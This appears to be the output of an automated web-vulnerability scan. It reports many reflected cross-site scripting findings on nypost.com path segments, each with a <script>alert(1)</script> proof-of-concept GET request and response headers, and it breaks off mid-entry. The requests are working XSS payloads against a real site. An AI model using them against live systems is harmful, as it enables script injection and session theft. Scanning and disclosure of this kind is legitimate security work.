The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f2971<script>alert(1)</script>30a54286f8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortalf2971<script>alert(1)</script>30a54286f8d/nypost/blocks/search/search.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 709 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:18 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1143<script>alert(1)</script>c95256133a5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nyposte1143<script>alert(1)</script>c95256133a5/blocks/search/search.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 709 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:19 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 656a0<script>alert(1)</script>f63b9bed0b7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks656a0<script>alert(1)</script>f63b9bed0b7/search/search.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 709 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:22 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8bb88<script>alert(1)</script>b7fbd52ec8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/search8bb88<script>alert(1)</script>b7fbd52ec8e/search.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 709 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:24 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 432cd<script>alert(1)</script>b84964f719b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/search/search.js432cd<script>alert(1)</script>b84964f719b HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 709 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:26 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd126<script>alert(1)</script>c1d984e9f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigcd126<script>alert(1)</script>c1d984e9f5/WebPortal/nypost/blocks/section_blocks/section_blocks.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 724 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:20 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fc07e<script>alert(1)</script>18b26adf38f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortalfc07e<script>alert(1)</script>18b26adf38f/nypost/blocks/section_blocks/section_blocks.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:23 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a4a5d<script>alert(1)</script>36fedfc3c24 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nyposta4a5d<script>alert(1)</script>36fedfc3c24/blocks/section_blocks/section_blocks.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:25 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6fea0<script>alert(1)</script>053db7657fd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks6fea0<script>alert(1)</script>053db7657fd/section_blocks/section_blocks.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:29 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9506a<script>alert(1)</script>1868b0311c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/section_blocks9506a<script>alert(1)</script>1868b0311c/section_blocks.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 724 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:31 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f8d2f<script>alert(1)</script>822b267aa84 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.jsf8d2f<script>alert(1)</script>822b267aa84 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:33 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8dcf5<script>alert(1)</script>3009b031cc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig8dcf5<script>alert(1)</script>3009b031cc8/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:23 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1dd24<script>alert(1)</script>9fc9fbf97a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal1dd24<script>alert(1)</script>9fc9fbf97a/nypost/blocks/shareit/fbconnect/xd_receiver.html HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 726 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:25 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9b3b<script>alert(1)</script>ff7b2a843e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostc9b3b<script>alert(1)</script>ff7b2a843e5/blocks/shareit/fbconnect/xd_receiver.html HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:29 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload de78f<script>alert(1)</script>abb6665de95 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksde78f<script>alert(1)</script>abb6665de95/shareit/fbconnect/xd_receiver.html HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:31 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c2734<script>alert(1)</script>28a1b25e7ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/shareitc2734<script>alert(1)</script>28a1b25e7ac/fbconnect/xd_receiver.html HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:33 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 77bb5<script>alert(1)</script>08c06ec80ce was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect77bb5<script>alert(1)</script>08c06ec80ce/xd_receiver.html HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:35 GMT Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 3a3f2<script>alert(1)</script>f91f8110b0b was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html3a3f2<script>alert(1)</script>f91f8110b0b HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:37 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1ce3<script>alert(1)</script>7b2ba9f8543 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigd1ce3<script>alert(1)</script>7b2ba9f8543/WebPortal/nypost/blocks/shareit/shareit.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:17 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a13a<script>alert(1)</script>44421082b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal9a13a<script>alert(1)</script>44421082b3/nypost/blocks/shareit/shareit.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 710 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:18 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1bf97<script>alert(1)</script>4e4eae4a68f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost1bf97<script>alert(1)</script>4e4eae4a68f/blocks/shareit/shareit.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:21 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2ba4<script>alert(1)</script>c28bde5bbb6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksc2ba4<script>alert(1)</script>c28bde5bbb6/shareit/shareit.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:36 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a45a2<script>alert(1)</script>cdbd1fa948e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/shareita45a2<script>alert(1)</script>cdbd1fa948e/shareit.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:38 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c6b92<script>alert(1)</script>039721b920c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.jsc6b92<script>alert(1)</script>039721b920c HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:40 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99311<script>alert(1)</script>1149864d175 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig99311<script>alert(1)</script>1149864d175/WebPortal/nypost/blocks/story_lists/story_lists.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:29 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7204f<script>alert(1)</script>b6d157950da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal7204f<script>alert(1)</script>b6d157950da/nypost/blocks/story_lists/story_lists.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:31 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa5f7<script>alert(1)</script>d4ffc399c68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostaa5f7<script>alert(1)</script>d4ffc399c68/blocks/story_lists/story_lists.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:33 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e111f<script>alert(1)</script>c3c145edb11 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blockse111f<script>alert(1)</script>c3c145edb11/story_lists/story_lists.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:35 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a0569<script>alert(1)</script>b1b95e01f44 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/story_listsa0569<script>alert(1)</script>b1b95e01f44/story_lists.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 719 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:37 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e3c41<script>alert(1)</script>99ae3cfd7e7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
